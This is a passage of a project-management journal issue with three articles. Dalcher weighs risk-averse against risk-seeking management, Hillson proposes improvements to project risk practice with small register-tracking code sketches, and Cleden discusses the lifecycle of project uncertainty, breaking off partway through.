positions regarding risk, thereby opening a wider discussion about the links to danger and safety. In rethinking our position, we are able to appraise the different strategies that are available and reason about the need to adopt a more balanced position, as an essential step towards developing a better-informed perspective for managing risk and potential.
Keywords: Anticipation, Danger, Resilience, Risk, Risk
Management, Safety.
Introduction
Imagine a clash between two worlds, one that is risk-averse, traditional and conservative, the other risk-seeking, opportunistic and entrepreneurial. The former is
the old world, dedicated to the precautionary principle parading under the banner ‘better safe than sorry’. The latter
is the new world, committed to the maxim ‘no pain, no gain’.
The question we are asked to address is whether the defensive posture exhibited by the old world or the forever offensive stance of the new world is likely to prevail.
Would their attitude to risk determine the outcome of
this question? The answer must be a qualified yes. The notion of risk has become topical and pervasive in many contexts. Indeed Beck [1] argues that risk has become a dominant feature of society, and that it has replaced wealth production as the means of measuring decisions.
In that Case, let’s survey the Combatants
Encamped on one bank, the old world is likely to resist
the temptation of genetically modified crops and hormone-induced products despite the advertised potential benefits.
Risk is traditionally perceived as a negative quantity, danger,
hazard or potential harm. Much of risk management is predicated around the concept of the precautionary principle,
asserting that acting in anticipation of the worst form of
harm should ensure that it does not materialise. Action is
therefore biased towards addressing certain forms of risk
that are perceived as particularly unacceptable and preventing them from occurring, even if scientific proof of the effects is not fully established. According to this principle,
old-world risk regulators cannot afford to take a chance with
some (normally highly political) risks.
Author
Darren Dalcher – PhD (Lond) HonFAPM, FBCS, CITP, FCMI
– is a Professor of Software Project Management at Middlesex
University, UK, and Visiting Professor in Computer Science in
the University of Iceland. He is the founder and Director of the
National Centre for Project Management. He has been named
by the Association for Project Management, APM, as one of the
top 10 "movers and shapers" in project management and has
also been voted Project Magazine’s Academic of the Year for
his contribution in "integrating and weaving academic work with
practice". Following industrial and consultancy experience in
managing IT projects, Professor Dalcher gained his PhD in Software Engineering from King’s College, University of London,
UK. Professor Dalcher is active in numerous international
committees, steering groups and editorial boards. He is heavily
involved in organising international conferences, and has
delivered many keynote addresses and tutorials. He has written
over 150 papers and book chapters on project management and
software engineering. He is Editor-in-Chief of Software Process
Improvement and Practice, an international journal focusing on
capability, maturity, growth and improvement. He is the editor
of a major new book series, Advances in Project Management,
published by Gower Publishing. His research interests are wide
and include many aspects of project management. He works
with many major industrial and commercial organisations and
government bodies in the UK and beyond. Professor Dalcher is
an invited Honorary Fellow of the Association for Project
Management (APM), a Chartered Fellow of the British Computer
Society (BCS), a Fellow of the Chartered Management Institute,
and a Member of the Project Management Institute, the Academy
of Management, the IEEE and the ACM. He has received an
Honorary Fellowship of the APM, "a prestigious honour
bestowed only on those who have made outstanding
contributions to project management", at the 2011 APM Awards
Evening. <[email protected]>
Old-world thinking supports the adoption of precautionary measures even when some cause and effect relationships
are not fully understood. In other words, the principle links
hazards or threats with (scientific) uncertainty to demand
defensive measures. Following the lead offered by the legal
systems of Germany, Sweden and Denmark, the precautionary principle is likely to be fully embraced in guiding European Commission policy (such as the White Paper on Food
Safety published by the Commission in 2000). When followed to the extreme, this policy leads to the pursuit of a
zero-risk approach, which, like zero defects, will remain elusive.
Amassed opposite is the new world, where risks convey
potential, opportunity and innovation. Risk offers the potential for gains, and occasionally creative chances and opportunities to discover new patterns of behaviour that can
lead to serious advantage over the competition. Risk thus
offers a key source of innovation. This can be viewed as the
aggressive entrepreneurial approach to business.
Who would you bet your Money on?
In the old-world camp, risk management is a disciplined
way of analysing risk and safety problems in well-defined
domains. The difficulty lies in the mix of complexity, ambiguity and uncertainty with human values where problems
are not amenable to old-world technical solutions. New-world problems manifest themselves as human interactions
with systems. They are complex, vexing socio-technical dilemmas involving multiple participants with competing interests and conflicting values (read that as opportunities).
A ground rule for the clash is that total elimination of
risk is both impossible and undesirable. It is a natural human tendency to try to eliminate a given risk; however that
may increase other risks or introduce new ones. Furthermore, the risks one is likely to attempt to eliminate are the
better-known risks that must have occurred in the past and
about which more is known. Given that elimination is not
an option, we are forced into a more visible coexistence with
risks and their implications. The rest of this article will focus on the dynamic relationship between safety, risk and
danger as an alternative way of viewing the risk–opportunity spectrum. It will therefore help to map, and potentially
resolve, the roots of the clash from an alternative perspective.
Away with Danger?
The old world equates risk with danger, in an attempt to
achieve a safer environment. If only it were that simple!
Safety may result from the experience of danger. Early programmes, models and inventions are fraught with problems.
Experience accumulates through interaction with and resolution of these problems. Trial and error leads to the ability
to reduce error. Eliminate all errors and you reduce the opportunity for true reflective learning.
Safety, be it in air traffic control systems, business environments, manufacturing or elsewhere, is normally achieved
through the accumulated experience of taking risks. In the
old world, the ability to know how to reduce risks inevitably grows out of historical interaction with risk. Solutions
are shaped by past problems. Without taking risks in order to learn how to reduce them, you would not know which solutions are safe or useful.
What happens when a risk is actually reduced? Experience reveals that safety also comes with a price. As we feel
safe, we tend to take more chances and attract new dangers. Research shows that the generation of added safety,
through safety belts in cars or helmets in sport, encourages
danger-courting behaviour, leading often to a net increase
in overall risk taking. This may be explained by the reduced incentive to avoid a risk, once protection against it
has been obtained.
Adding safety measures also adds to the overall complexity of the design process and the designed system, and
to the number of interactions, thereby increasing the difficulty of understanding them and the likelihood of accidents
and errors. In some computer systems, adding safety devices may likewise decrease the overall level of safety. The
more interconnected the technology and the greater the
number of components, the greater the potential for components to affect each other unexpectedly and to spread
problems, and the greater the number of potential ways for
something to go wrong.
So far we have observed that risk and danger maintain
a paradoxical relationship, where risks can improve safety
and safety measures can increase risks. Danger and benefits are intertwined in complex ways ensuring that safety
always comes at a price. Safety, like risk, depends on the
perception of participants.
Predicting Danger
The mitigation of risk, as practised in the old world, is
typically predicated on the assumption of anticipation. It
thus assumes that risks can be identified, characterised,
quantified and addressed in advance of their occurrence.
The separation of cause and effect, implied by these actions, depends on stability and equilibrium within the system. The purpose of intended action is to return the system
to the status quo following temporary disturbances. The
old world equates danger with deviation from the status
quo, which must be reversed. The purpose of risk management is to apply resources to eliminate such disturbances.
The old-world is thus busy projecting past experience into
the future. It is thus perfectly placed to address previous
battles but not new engagements.
The assumption of anticipation offers a bad bet in an
uncertain and unpredictable environment. An alternative
strategy is resilience, which represents the way an organism or a system adapts itself to new circumstances in a more
active and agile search for safety. The type of approach
applied by new-world practitioners calls for an ability to
absorb change and disruption, keep options open, and deal
with the unexpected by conserving energy and utilising surplus
resources more effectively and more creatively.
The secret in new-world thinking is to search for the
next acceptable state rather than focus on returning to the
previous state. In the absence of knowledge about the future, it is still possible to respond to change, by finding a
new beneficial state as the result of a disturbance. Bouncing back and grabbing new opportunities becomes the order of the day. Entrepreneurs, like pilots, learn to deal with
new situations through the gradual development of a portfolio of coping patterns and strategies that is honed by experience. Above all they learn to adapt and respond.
New-world actors grow up experimenting. Trial and
experimentation make them more knowledgeable and capable. Experiments provide information and varied experience about unknown processes, different strategies and alternative reaction modes. Intelligent risk-taking in the form
of trial and error leads to true learning and ultimate improvement. The key to avoiding dramatic failures, and to
developing new methods and practice in dealing with them,
lies in such learning-in-the-small.
Acceptance of small errors is at the crux of developing
the skills and capability to deal with larger problems. Small
doses of danger provide the necessary feedback for learning and improvement. Similar efforts are employed by credit
card companies, banks and security organisations, who orchestrate frequent threats and organised breaches of security to test their capability and learn new strategies and approaches for coping with problems. In the new world, taking small chances is a part of learning — and so is failure!
Small, recognisable and reversible actions permit experimentation with new phenomena at relatively low risks. Once
again we paradoxically discover that contained experimentation with danger leads to improved safety.
Large numbers of small moves, with frequent feedback
and adjustment permit experimentation on a large scale with
new phenomena at relatively low risks. Contained experimentation with danger leads to improved understanding of
safety. Risk management is therefore a balancing act between stopping accidents, increasing safety, avoiding catastrophes and receiving rewards. Traditional
mechanistically based risk management spends too much
time and effort on minimising accidents: as a result it loses
the ability to respond, ignores potential rewards and opportunities, and may face tougher challenges as they accumulate. It also focuses excessively on reducing accidents, to
the extent that rewards are often neglected and excluded
from decision-making frames. Such fixation with worst-case
scenarios and anticipation of worst-case circumstances often leads to an inability to deal with alternative scenarios.
In the new world, safety is not a state or status quo, but
a dynamic process that tolerates natural change and discovery cycles. It can thus be viewed as a discovered commodity. This resource needs to be maintained and cherished
to preserve its relevance and value. Accepting safety (and
even danger?) as a resource makes possible the adoption of
a long-term perspective, and it thus becomes natural to strive
for the continuous improvement of safety.
While many organisations may object to the introduction of risk assessment and risk management because of
the negative overtones, it is more difficult to resist an ongoing perspective emphasising improvement and enhanced
safety. After all, successful risk assessment, like testing, is
primarily concerned with identifying problems (albeit before they occur). The natural extension, therefore, is not to
focus simply on risk as a potential for achievement, but to
regard the safety to which it can lead as a resource worth
cherishing.
Like other commodities, safety degrades and decays
with time. The safety asset therefore needs continuous maintenance to reverse entropy and maintain its relevance with
respect to an ever-changing environment. Relaxing of this
effort will lead to a decline both in the level of safety and in
its value as a corporate asset. In order to maintain its value,
the process of risk management (or more appealingly, safety
management) must be kept central and continuous.
Exploring risks as an ongoing activity offers another
strategic advantage, in the form of the continuous discovery of new opportunities. Risk anticipation locks actors into
the use of tactics that have worked in the past (even doing
nothing reduces the number of available options). Resilience and experimentation can easily uncover new options
and innovative methods for dealing with problems. They
thus lead to divergence, and the value of the created diversity is in having the ability to call on a host of different
types of solutions.
Miller and Friesen observe that successful organisations
appear to be sensitive to changes in their environment [2].
Peters and Waterman [3] report that successful companies
typically:
• experiment more,
• encourage more tries,
• permit small failures,
• keep things small,
• interact with customers,
• encourage internal competition and allow resultant duplication and overlap, and
• maintain a rich information environment.
Uncertainty and ambiguity lead to potential opportunities as well as ‘unanticipated’ risks. Resilience is built
through experimentation, through delaying commitment,
through enabling, recognising and embracing opportunities
and, above all, through the acquisition of knowledge, experience and practice in dealing with adversity-in-the-small.
Risk management requires flexible technologies arranged
with diversity and agility. Generally, a variety of styles, approaches and methods are required to ensure that more problems can be resolved. This argument can be extended to propose that such a diverse armoury should include anticipation (which is essentially proactive), as well as resilience
(essentially reactive in response to unknowable events) in
various combinations. The two approaches are not mutually exclusive and can complement one another as each responds to a particular type of situation.
Resilience and exploration are ideal under conditions of
ambiguity and extreme uncertainty. Anticipation can be used
under risky, yet reasonably certain, conditions; while the
vast space in between would qualify for a balanced combination of anticipation and resilience operating in concert.
The management of risks therefore needs to be coupled
to the nature of the environment. After all, managing progress
is not about fitting an undertaking to a (probably already
redundant) plan, but is about reducing the difference between plan and reality. This need not be achieved through
the elimination of problems (which may prove to be a source
of innovation), but through adaptation to changing circumstances. By overcoming the momentum that resists change,
with small incursions and experiments leading to rapid feedback, it becomes possible to avoid major disasters and dramatic failures through acting in-the-small and utilising agile risk management.
Remember the two Worlds?
Well, it appears we need both. The old world is outstanding at using available information in an effort to improve
efficiency and execution, while the new world is concerned
with potential, promise and innovation.
The single most important characteristic of success has
often been described as conflict or contention. The clash
between the worlds provides just that. It gives rise to a portfolio of attitudes, experiences and expertise that can be used
as needed. Skilful manipulation of the safety resource and
the knowledge of both worlds would entail balancing a portfolio of risks, ensuring that the right risks are taken and that
the right opportunities are exploited while keeping a watchful eye on the balance between safety and danger. A satisfactory balance will thus facilitate the exploration of new
possibilities alongside the exploitation of old and well-understood certainties. By consulting all those affected by risks,
and by maximising the repertoire, it becomes possible to
damp the social amplification of risk and to embrace risk
and danger from an intelligent and collective perspective.
If this balance is not achieved, one of the two worlds
will prevail. They will bring with them their baggage, which
will dominate risk practice. A practice dominated by either
‘better safe than sorry’ or ‘no pain, no gain’ will be unable
to combine the benefits of agile exploration and mature exploitation. Intelligent risk management depends on a dynamic balancing act that is responsive to environmental
feedback.
Perhaps more importantly, the justification for creating
such a balance lies in taking a long-term perspective and
viewing safety as an evolving commodity. Risk management is not a service. A specific risk may be discrete, but
risk management is a growing and evolving body of knowledge: an improving asset. In this improvement lies the
value of the asset.
"There is no point in getting into a panic about the risks
of life until you have compared the risks which worry you
with those that don’t, but perhaps should!"
Lord N. Rothschild, 1978
Once we graduate beyond viewing risk management as
a fad offered by either world, we can find the middle ground
and the benefit of both worlds.
References:
[1] U. Beck, Risk Society: Towards a New Modernity,
Sage, London, 1992.
[2] D. Miller and P. H. Friesen, "Archetypes of Strategy
Formulation", Management Science, Vol. 24, 1978, pp.
921-923.
[3] T. J. Peters and R. H. Waterman, In Search Of Excellence: Lessons From America’s Best-Run Companies,
Harper and Row, London, 1982.
To probe further:
• C. Hood and D. K. C. Jones (Eds.), Accident and Design: Contemporary Debates in Risk Management, UCL Press, London, 1996.
• V. Postrel, The Future and Its Enemies: The Growing Conflict over Creativity, Enterprise and Progress, Scribner Book Company, 1999.
• A. Wildavsky, Searching for Safety, Transaction Books, Oxford, 1988.
• <http://www.biotech-info.net/precautionary.html>.
• <http://europa.eu.int/comm/dgs/health_consumer/library/press/press38_en.html>.
• <http://www.sehn.org/precaution.html>.
Managing Risk in Projects: What’s New?1
David Hillson, "The Risk Doctor"
Project Risk Management has continued to evolve into what many organisations consider to be a largely mature discipline. Given this evolution we can ask if there are still new ideas that need to be considered in the context of managing
project risks. In this article we consider the state of project risk management and reflect on whether there is still a
mismatch between project risk management theory and practice. We also look for gaps in the available practice and
suggest some areas where further improvement may be needed, thereby offering insights into new approaches and perspectives.
Keywords: Energy Levels for Risk Management, Human Aspects, Individual Project Risk, Overall Project Risk,
Post-Project Review, Project Risk Management Principles,
Project Risk Process, Risk Responses.
Author
David Hillson (FIRM HonFAPM PMI-Fellow FRSA FCMI),
known globally as “The Risk Doctor”, is an international risk
consultant and Director of Risk Doctor & Partners, offering
specialist risk management consultancy across the globe, at both
strategic and tactical levels. He has worked in over 40 countries
with major clients in most industry sectors. David is recognised
internationally as a leading thinker and practitioner in risk
management, and he is a popular conference speaker and author
on the subject. He has written eight books on risk, as well as
many papers. He has made several innovative contributions to
the discipline which have been widely adopted. David is wellknown for promoting inclusion of opportunities throughout the
risk process. His recent work has focused on risk attitudes (see
<http://www.risk-attitude.com>), and he has also developed a
scaleable risk methodology, <http://www.ATOM-risk.com>.
David was named Risk Personality of the Year in 2010 by the
Institute of Risk Management (IRM). He was the first recipient
of this award, recognising his significant global contribution to
improving risk management and advancing the risk profession.
He is also an Honorary Fellow of the UK Association for Project
Management (APM), and a PMI Fellow in the Project
Management Institute (PMI®), both marking his contribution
to developing project risk management. David was elected a
Fellow of the Royal Society of Arts (RSA) to contribute to its
Risk Commission. He is currently leading the RSA Fellows
project on societal attitudes to failure. He is also a Chartered
Manager and Fellow of the Chartered Management Institute
(CMI), reflecting his broad interest in topics beyond his own
speciality of risk management. <[email protected]>
Humans have been undertaking projects for millennia,
with more or less formality, and with greater or lesser degrees of success. We have also recognised the existence of
risk for about the same period of time, understanding that
things don’t always go according to plan for a range of reasons. In relatively recent times these two phenomena have
coalesced into the formal discipline called project risk management, offering a structured framework for identifying
and managing risk within the context of projects. Given the
prevalence and importance of the subject, we might expect
that project risk management would be fully mature by now,
only needing occasional minor tweaks and modifications
to enhance its efficiency and performance. Surely there is
nothing new to be said about managing risk in projects?
While it is true that there is wide consensus on project
risk management basics, the continued failure of projects
to deliver consistent benefits suggests that the problem of
risk in projects has not been completely solved. Clearly there
must be some mismatch between project risk management
theory and practice, or perhaps there are new aspects to be
discovered and implemented, otherwise all project risks
would be managed effectively and most projects would succeed.
So what could possibly remain to be discovered about
this venerable topic? Here are some suggestions for how
we might do things differently and better, under four headings:
1. Principles
2. Process
3. People
4. Persistence

1 This article was previously published online in the "Advances in Project Management" column of PM World Today (Vol. XII Issue II - February 2010), <http://www.pmworldtoday.net/>. It is republished with all permissions.
Problems with Principles
There are two potential shortfalls in the way most project
teams understand the concept of risk. It is common for the
scope of project risk management processes to be focused
on managing possible future events which might pose threats
to project cost and schedule. While these are undoubtedly
important, they are by no means the full story. The broad
proto-definition of risk as "uncertainty that matters" encompasses the idea that some risks might be positive, with potential upside impacts, mattering because they could enhance
performance, save time or money, or increase value. And
risks to objectives other than cost and schedule are also important and must be managed proactively. This leads to the
use of an integrated project risk process to manage both
threats and opportunities alongside each other. This is more
than a theoretical nicety: it maximises a project’s chances
of success by intentionally seeking out potential upsides and
capturing as many as possible, as well as finding and avoiding downsides.
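As a purely illustrative sketch (the field names, the probability-times-impact rollup and the example figures below are assumptions made for illustration, not a prescribed scoring scheme), such an integrated register might record opportunities alongside threats by giving them a negative cost impact, so that upsides and downsides are weighed together:

from dataclasses import dataclass

@dataclass
class Risk:
    """One individual project risk: an 'uncertainty that matters'."""
    description: str
    probability: float  # chance of occurring, 0.0 to 1.0
    impact: float       # expected effect on cost; positive = threat, negative = opportunity

def net_exposure(register: list[Risk]) -> float:
    """Indicative net exposure: the sum of probability-weighted impacts.
    A positive result means threats currently outweigh opportunities."""
    return sum(r.probability * r.impact for r in register)

# Example figures are invented for illustration only.
register = [
    Risk("Key supplier delivers late", 0.30, 50_000),                 # threat
    Risk("Integration rework required", 0.20, 80_000),                # threat
    Risk("Reuse of an existing module saves effort", 0.40, -30_000),  # opportunity
]

print(f"Net expected exposure: {net_exposure(register):,.0f}")

A register kept in this form makes it harder to quietly drop the upside: every review of the threats also surfaces the opportunities that have not yet been captured.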
Another conceptual limitation which is common in the
understanding of project risk is to think only about detailed
events or conditions within the project when considering
risk. This ignores the fact that the project itself poses a risk
to the organisation at a higher level, perhaps within a programme or portfolio, or perhaps in terms of delivering strategic value. The distinction between "overall project risk"
and "individual project risks" is important, leading to a recognition that risk exists at various levels reflecting the context of the project. It is therefore necessary to manage overall project risk (risk of the project) as well as addressing
individual risk events and conditions (risks in the project).
This higher level connection is often missing in the way project
risk management is understood or implemented, limiting the
value that the project risk process can deliver. Setting project
risk management in the context of an integrated Enterprise Risk
Management (ERM) approach can remedy this lack.
Problems with Process
The project risk process as implemented by many organisations is often flawed in a couple of important respects.
The most significant of these is a failure to turn analysis
into action, with Risk Registers and risk reports being produced and filed, but with these having little or no effect on
how the project is actually undertaken. The absence of a
formal process step to "Implement Risk Responses" reinforces this failing. It is also important to make a clear link
between the project plan and risk responses that have been
agreed and authorised. Risk responses need to be treated in
the same way as all other project tasks, with an agreed
owner, a budget and timeline, included in the project plan,
reported on and reviewed. If risk responses are seen as "optional extras" they may not receive the degree of attention
they deserve.
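As a minimal sketch of what treating a response like any other project task might look like (the structure and field names below are assumptions made for illustration, not a prescribed format), each agreed response carries an owner, a budget and a due date, and a simple check flags responses that have not yet been implemented:

from dataclasses import dataclass
from datetime import date

@dataclass
class RiskResponse:
    """An agreed risk response, carried like any other project task."""
    risk_id: str
    action: str
    owner: str            # agreed owner
    budget: float         # allocated budget
    due: date             # timeline commitment
    in_project_plan: bool = False
    implemented: bool = False

def outstanding(responses: list[RiskResponse], today: date) -> list[RiskResponse]:
    """Responses that are not implemented and are either missing from the
    project plan or already due; the gap an 'Implement Risk Responses' step closes."""
    return [r for r in responses
            if not r.implemented and (not r.in_project_plan or r.due <= today)]

# Example entries are invented for illustration only.
responses = [
    RiskResponse("R-01", "Qualify a second supplier", "A. Brown", 5_000, date(2011, 11, 30), True),
    RiskResponse("R-02", "Prototype the interface early", "C. Diaz", 8_000, date(2011, 12, 15)),
]

for r in outstanding(responses, date(2011, 12, 1)):
    print(f"{r.risk_id}: '{r.action}' (owner {r.owner}) needs attention")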
A second, equally vital omission is the lack of a "post-project review" step in most risk processes. This is linked
to the wider malaise of failure to identify lessons to be
learned at the end of each project, denying the organisation
the chance to learn from its experience and improve performance on future projects. There are many risk-related
lessons to be learned in each project, and the inclusion of a
formal "Post-project Risk Review" will help to capture
these, either as part of a more generic project meeting or as
a separate event. Such lessons include identifying which
threats and opportunities arise frequently on typical projects,
finding which risk responses work and which do not, and
understanding the level of effort typically required to manage risk effectively.
Problems with People
It is common for project risk management to be viewed
as a collection of tools and techniques supporting a structured system or a process, with a range of standard reports
and outputs that feed into project meetings and reviews.
This perspective often takes no account of the human aspects of managing risk. Risk is managed by people, not by
machines, computers, robots, processes or techniques. As
a result we need to recognise the influence of human psychology on the risk process, particularly in the way risk
attitudes affect judgement and behaviour. There are many
sources of bias, both outward and hidden, affecting individuals and groups, and these need to be understood and
managed proactively where possible.
The use of approaches based on emotional literacy to
address the human behavioural aspects of managing risk in
projects is in its infancy. However some good progress has
been made in this area, laying out the main principles and
boundaries of the topic and developing practical methods
for understanding and managing risk attitude. Without taking this into account, the project risk management process
as typically implemented is fatally flawed, relying on judgements made by people who are subject to a wide range of
unseen influences, and whose perceptions may be unreliable with unforeseeable consequences.
Problems with Persistence
Even where a project team has a correct concept of risk that includes opportunity and addresses the wider context, ensures that risk responses are implemented effectively and risk-related lessons are learned at the end of the project, and takes steps to address risk attitudes proactively – it is still possible for the risk process to fail!
This is because the risk challenge is dynamic, constantly
changing and developing throughout the project. As a result, project risk management must be an iterative process,
requiring ongoing commitment and action from the project
team. Without such persistence, project risk exposure will
get out of control, the project risk process will become ineffective and the project will have increasing difficulty in
reaching its goals.
Insights from the new approach of "risk energetics" suggest that there are key points in the risk process where the
energy dedicated by the project team to managing risk can
decay or be dampened. A range of internal and external
Critical Success Factors (CSFs) can be deployed to raise
and maintain energy levels within the risk process, seeking
to promote positive energy and counter energy losses. Internal CSFs within the control of the project include good
risk process design, expert facilitation, and the availability
of the required risk resources. Equally important are external CSFs beyond the project, such as the availability of appropriate infrastructure, a supportive risk-aware organisational culture, and visible senior management support.
So perhaps there is still something new to be said about
managing risk in projects. Despite our long history in attempting to foresee the future of our projects and address
risk proactively, we might do better by extending our concept of risk, addressing weak spots in the risk process, dealing with risk attitudes of both individuals and groups, and
taking steps to maintain energy levels for risk management
throughout the project. These simple and practical steps offer
achievable ways to enhance the effectiveness of project risk
management, and might even help us to change the course
of future history.
Note: All of these issues are addressed in the book "Managing Risk in Projects" by David Hillson, published in August 2009
by Gower (ISBN 978-0-566-08867-4) as part of the Fundamentals in Project Management series.
Our Uncertain Future
David Cleden
Risk arises from uncertainty but it is difficult to express all types of uncertainty in terms of risks. Therefore managing
uncertainty often requires an approach which differs from conventional risk management. A knowledge of the lifecycle of
uncertainty (latency, trigger points, early warning signs, escalation into crisis) helps to inform the different strategies
which can be used at different stages of the lifecycle. This paper identifies five tenets to help project teams deal more
effectively with uncertainty, combining pragmatism (e.g. settle for containing uncertainty, don’t try to eliminate it completely), an emphasis on informed decision-making, and the need for projects to be structured in an agile fashion to
increase their resilience in the face of uncertainty.
Keywords: Agility, Decision-Making, Latent Uncertainty, Management Strategies, Resilience, Risk, Trigger
Point, Uncertainty, Uncertainty Lifecycle, Unexpected Outcomes.
1 Introduction
There is a fundamental truth that all management professionals would do well to heed: all risks arise from uncertainties, but not all uncertainties can be dealt with as
risks. By this we mean that uncertainty is the source of every
risk (arising from, for example, information that we don’t
possess, something that we can’t forecast, decisions that
have not yet been made). However, a set of project risks –
no matter how comprehensive the risk analysis – will only
address a subset of the uncertainties which threaten a project.
We know this empirically. For every credible risk that is
identified, we reject (or choose to ignore) a dozen others.
These are ‘ghost risks’ – events considered to be most unlikely to occur, or too costly to make any kind of effective
provision for. Risk management quite rightly acts on priorities: what are the things that represent the greatest threat
to this project, and what action can be take to reduce this
threat? But prioritisation means that at some point the line
is drawn: above it are the risks that are planned for and
actively managed. Below the line are risks that have a low
likelihood of occurring, or will have minimal impact if they
do, or (sometimes) have no effective means of prevention
or mitigation. Not surprisingly, where the line is drawn very
much depends on a project’s ‘risk appetite’. A project with
a low risk appetite, where human lives or major investment is at stake, will be far more diligent in the risk analysis than
one where the prospect of failure may be unwelcome but
can be tolerated.
No matter where the line is drawn in terms of risks we
choose to recognise, there remain risks that cannot be formulated at this time, no matter how desirable this might be.
By definition, if we cannot conceive of a threat, we cannot
formulate it as a risk and manage it accordingly, as Figure 1
shows. These may be the so-called ‘black swan’ events, or
‘bolts from the blue’ – things that it would be very difficult,
if not impossible to know about in advance – or, just as likely, they may be gaps in our understanding or knowledge of the tasks to be undertaken.

Figure 1: Not All Uncertainties can be analysed and formulated as Risks.

Author

David Cleden is a senior Project Manager with more than twenty years’ experience of commercial bid management and project delivery, mainly within the public sector. With a successful track record in delivering large and technically challenging IT projects, he also writes widely on the challenges faced by modern businesses striving for efficiency through better management processes. He is the author of "Managing Project Uncertainty", published by Gower, part of the Advances in Project Management series edited by Professor Darren Dalcher, and “Bid Writing for Project Managers”, also published by Gower. <[email protected]>
A knowledge-based analytical approach is often helpful to understanding the threat from this kind of uncertainty.
Some uncertainty is susceptible to analysis and can be managed as risks, but some cannot. We don’t know anything
about these risks (principally because we have not conceived, or cannot conceive, of them) but it is entirely possible that some
of these would rank highly in our risk register if we could.
Let’s examine the possibilities (see Figure 2). The top-left quadrant describes everything that we know (or think
we know) about the project. This is the knowledge which
plans are built on, which informs our decision-making processes and against which we compare progress. Broadly
speaking, these are the facts of the project.
Often there are more facts available than we realise.
These are things that we don’t know, but could if we tried.
This untapped knowledge can take many forms – a colleague with relevant experience or skills that we haven’t
consulted, lessons learnt from a previous project which could
aid our decision-making, standards, guidelines and best practices which the project team have overlooked – and many
other things besides. In the knowledge-centric view of uncertainty, clearly the more facts and information we possess, the better able we are to deal with uncertainty.
Naturally, no matter how good our understanding of the
project’s context, there will always be gaps. By acknowledging this, we accept that there are some things about the
project that we don’t know or can’t predict with accuracy
(the classic ‘known unknowns’). However, as long as they
can be conceived of, they can be addressed as risks using
risk management techniques.
What does this leave us with? The fourth quadrant, the
‘unknown unknowns’, represents the heart of uncertainty.
This kind of uncertainty is unfathomable; it is not susceptible to analysis in the way that risks are. By definition we
have little knowledge of its existence (although if we did,
we might be able to do something about it). Some terrible
event (a natural disaster or freak combination of circumstances, say) may occur tomorrow which will fundamentally undermine the basis on which the project has been
planned, but we have no way of knowing the specifics of
this event or how it might impact the project.
Note that it is possible to know a situation is unfathomable without being able to change the fundamental nature of
the uncertainty. Someone may tell us that a terrible danger
lurks behind a locked door, but we still have no idea (and no
practical way of finding out) what uncertainty faces us if we
unlock the door and enter. We know the situation is unfathomable but we don’t know what it is that we don’t know. In other
words, the future is still unforeseeable.
All this points to a need for a project to have not only a
sound risk management strategy in place, but an effective
strategy for dealing with uncertainty. The unfathomable uncertainty of ‘unknown unknowns’ may not be susceptible to the kind of analysis techniques used in risk management, but that doesn’t mean a project cannot be prepared to deal with uncertainty.

2 The Lifecycle of Uncertainty
Any strategy for managing project uncertainty
depends on an understanding of the lifecycle of uncertainty. At different stages in this lifecycle we have
different opportunities for addressing the issues.
It begins with a source of uncertainty (see Figure 3). In the moment of crisis we may not always
be aware of the source, but hindsight will reveal its
existence. If detected early enough, anticipation
strategies can be used to contain the uncertainty at
source. Anticipating uncertainty often means trying
to learn more about the nature of the uncertainty;
for example by framing the problem it represents,
or modelling future scenarios and preparing for them.
Using discovery techniques such as constructing a
knowledge map of what is and isn’t known about a
particular issue can highlight key aspects of unfathomable
uncertainty. Of course, once a source of uncertainty is revealed, it is no longer unfathomable and can be dealt with
as a project risk.
The greatest threat arises towards the end of the uncertainty lifecycle as problems gain momentum and turn into
crises. Something happens to trigger a problem, giving rise
to an unexpected event. For example, it may not be until
two components are integrated that it becomes apparent that
incorrect manufacturing tolerances have been used. The latent uncertainty (what manufacturing tolerance is needed?)
triggers an unexpected outcome (a bad fit) only at the point
of component integration, even though the uncertainty could
have been detected much earlier and addressed.
This trigger may be accompanied by early warning signs.
Figure 2: A Knowledge-centric View of Uncertainty and Risk.
Figure 3: The Uncertainty Lifecycle and the Strategies Best Suited to addressing Uncertainty.
An alert project manager may be able to respond swiftly
and contain the problem even without prior knowledge of
the uncertainty, either by recognising the warning signs or
removing the source of uncertainty before it has a chance to
develop.
It is also worth remembering that many kinds of uncertainty will never undergo the transition which results in an
unexpected outcome. Uncertainty which doesn’t manifest
as a problem is ultimately no threat to a project. Once again,
the economic argument (that it is neither desirable nor possible to eliminate all uncertainty from a project) is a powerful one. The goal is to focus sufficient effort on the areas of
uncertainty that represent the greatest threat and have the
highest chance of developing into serious problems.
Based on this understanding of the uncertainty lifecycle,
different sets of strategies are effective at different points:
• Knowledge-centric strategies: These help to reveal
the sources of uncertainty, resolve them where possible or
prepare appropriately, for example through mitigation planning and risk management.
• Anticipation strategies: These offer a more holistic approach than the knowledge-centred view of uncertainty. By looking at a project from different perspectives,
for example by visualising future scenarios and examining
causal relationships, previously hidden uncertainties are
revealed.
• Resilience strategies: Trying to contain uncertainty
at source will never be 100 percent successful. Therefore, a
project needs resilience and must be able to detect and respond rapidly to unexpected events. Whilst it is impossible
to predict the nature of the problems in advance, a project
manager can employ strategies which will imbue their
projects with much greater resilience.
• Learning strategies: These give the project manager and the organisation as a whole the ability to improve
and benefit from experience over time. No two projects face
exactly the same uncertainty, so it is important to be able to
adapt and learn lessons.
3 Five Tenets for Dealing Effectively with Project
Uncertainty
3.1 Aim to contain Uncertainty, not eliminate it
No individual can bring order to the universe, and neither can the project manager protect his or her project from
every conceivable threat. Managers who try to do this labour under unworkable risk management regimes, constructing unwieldy risk logs and impossibly costly mitigation
plans. Amidst all the effort being poured into managing
small, hypothetical risks (the ‘ghost risks’), a project manager may be too busy to notice that the nuts and bolts of the
project – where the real focus of attention should be – have
come loose. It is much better to concentrate on detecting
and reacting swiftly to early signs of problems. Whilst uncertainty can never be entirely eliminated, it can most certainly be contained, and that should be good enough. Ultimately this is a far more effective use of resources.
It may be helpful to visualise the project as existing in a
continual state of dynamic tension (see Figure 4). The accumulation of uncertainties continually tries to push the
project off its planned path. If left unchecked, the problems
may grow so severe that there is no possibility of recovering back to the original plan.

Figure 4: The Illusion of Project Stability.
The project manager’s role is to act swiftly to correct
the deviations, setting actions to resolve issues, implementing contingency plans or nipping problems in the bud. This
requires mindfulness and agility: mindfulness to be able to
spot things going wrong at the earliest possible stage, and
agility in being able to react swiftly and effectively to damp
down the problems and bring the project back on track.
3.2 Uncertainty is an Attribute not an Entity in its
Own Right
We often talk about uncertainties as if they are discrete
objects when in fact uncertainty is an attribute of every aspect of the project. The ‘object’ model of uncertainty is
unhelpful because it suggests that there are clusters of uncertainties hiding away in the darker corners of the project.
